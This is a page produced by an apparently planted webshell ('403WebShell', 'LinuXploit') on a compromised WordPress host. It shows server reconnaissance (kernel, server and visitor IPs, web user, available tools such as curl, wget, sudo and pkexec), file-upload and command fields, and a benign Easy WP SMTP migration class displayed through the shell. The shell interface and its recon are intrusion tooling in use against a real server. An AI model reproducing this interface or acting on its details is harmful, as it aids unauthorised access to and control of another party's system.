Uname:Linux ip-11-115-0-196 6.8.0-1039-aws #41~22.04.1-Ubuntu SMP Thu Sep 11 10:54:48 UTC 2025 x86_64

403WebShell
403Webshell
Server IP : 13.126.101.145  /  Your IP : 216.73.216.159
Web Server : Apache/2.4.52 (Ubuntu)
System : Linux ip-11-115-0-196 6.8.0-1039-aws #41~22.04.1-Ubuntu SMP Thu Sep 11 10:54:48 UTC 2025 x86_64
User : www-data ( 33)
PHP Version : 8.3.17
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/rentals_updated/wp-content/plugins/easy-wp-smtp/src/Migrations/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/rentals_updated/wp-content/plugins/easy-wp-smtp/src/Migrations/GeneralMigration.php
<?php

namespace EasyWPSMTP\Migrations;

use EasyWPSMTP;
use EasyWPSMTP\Tasks\Meta;

/**
 * Class Migration helps migrate plugin options, DB tables and more.
 *
 * @since 2.0.0
 */
class GeneralMigration extends MigrationAbstract {

	/**
	 * Version of the latest migration.
	 *
	 * @since 2.0.0
	 */
	const DB_VERSION = 1;

	/**
	 * Option key where we save the current migration version.
	 *
	 * @since 2.0.0
	 */
	const OPTION_NAME = 'easy_wp_smtp_migration_version';

	/**
	 * Option key where we save any errors while performing migration.
	 *
	 * @since 2.0.0
	 */
	const ERROR_OPTION_NAME = 'easy_wp_smtp_migration_error';

	/**
	 * Migration from 1.x to 2.0.0.
	 * Create Tasks\Meta table, if it does not exist.
	 *
	 * @since 2.0.0
	 */
	protected function migrate_to_1() {

		$meta = new Meta();

		// Create the table if it doesn't exist.
		if ( $meta && ! $meta->table_exists() ) {
			$meta->create_table();
		}

		$this->update_db_ver( 1 );
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit